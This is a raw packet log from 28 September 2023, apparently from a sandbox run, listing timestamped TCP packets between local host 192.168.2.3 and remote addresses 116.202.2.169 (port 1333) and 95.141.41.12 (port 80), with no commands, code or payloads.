Sep 28, 2023 06:01:59.710900068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710913897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.710937977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710957050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.710980892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711018085 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711034060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711071968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711105108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711143970 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711175919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711211920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711222887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711258888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711291075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711329937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711345911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711381912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711401939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711440086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711666107 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711704016 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711755991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711797953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.711859941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.711909056 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712047100 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712063074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712096930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712111950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712152004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712196112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712214947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712255955 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712265015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712304115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712459087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712510109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712513924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712527990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712548018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712569952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.712610006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.712646008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.716084957 CEST	80	49814	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.721676111 CEST	80	49814	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.721741915 CEST	49814	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.826687098 CEST	49814	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.827349901 CEST	49816	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.882646084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.882736921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.882807016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.882848978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.882865906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.882888079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.882914066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.882925034 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.882935047 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.882961988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.882975101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.882998943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883008957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883050919 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883125067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883162975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883176088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883198977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883217096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883234978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883248091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883272886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883281946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883325100 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883374929 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883414030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883428097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883461952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883517027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883572102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883644104 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883699894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883712053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883759975 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883814096 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883850098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883871078 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883898020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883918047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.883966923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.883985043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884033918 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884053946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884088993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884102106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884136915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884190083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884248018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884295940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884332895 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884357929 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884367943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884377003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884413004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884435892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884483099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884504080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884548903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884571075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884614944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884639025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884682894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884707928 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884742975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884751081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884778976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884785891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884821892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884845972 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884890079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884912968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.884957075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.884999990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885049105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885067940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885111094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885135889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885170937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885178089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885214090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885237932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885272980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885282040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885315895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885339975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885382891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885409117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885443926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885452032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885482073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885485888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885525942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885550022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885586023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885595083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885627985 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885684013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885721922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885727882 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885763884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885788918 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885824919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885834932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885868073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885921001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.885963917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.885987997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886033058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886054993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886097908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886358023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886393070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886405945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886447906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886457920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886487961 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886492968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886524916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886531115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886560917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886568069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886598110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886604071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886634111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886641979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886671066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886682987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886707067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886713028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886743069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886749983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886785030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886792898 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886821032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886827946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886864901 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886919022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.886960983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.886987925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887025118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887044907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887068987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887093067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887140989 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887160063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887196064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887204885 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887243986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887295008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887331963 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887346983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887367964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887383938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887425900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887466908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887520075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887537003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887587070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887604952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887655973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887674093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887726068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887772083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887824059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887840033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887876987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887892008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887912035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887932062 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887950897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.887968063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.887990952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888019085 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888056993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888071060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888106108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888125896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888180017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888194084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888236046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888251066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888298988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888319969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888370037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888540983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888577938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888591051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888629913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888683081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888736963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888782978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888832092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888880014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888916016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888931036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888952017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.888967991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.888988018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889005899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889028072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889039040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889065027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889074087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889101982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889117002 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889137983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889149904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889173985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889192104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889214039 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889220953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889262915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889314890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889350891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889367104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889388084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889409065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889432907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889487028 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889535904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889585018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889621019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889636040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889676094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889719009 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889755964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889771938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889807940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889823914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889873981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889921904 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889957905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.889974117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.889995098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890003920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890043974 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890069962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890124083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890142918 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890180111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890192032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890216112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890229940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890253067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890269041 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890305042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890355110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890391111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890414000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890455961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890480995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890516996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890533924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890552998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890563011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890588999 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890603065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890625954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890642881 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890662909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890676022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890710115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890759945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890810013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890820980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890861034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.890886068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.890925884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891007900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891047955 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891117096 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891155958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891180038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891217947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.891283989 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891308069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.891325951 CEST	49810	1333	192.168.2.3	116.202.2.169
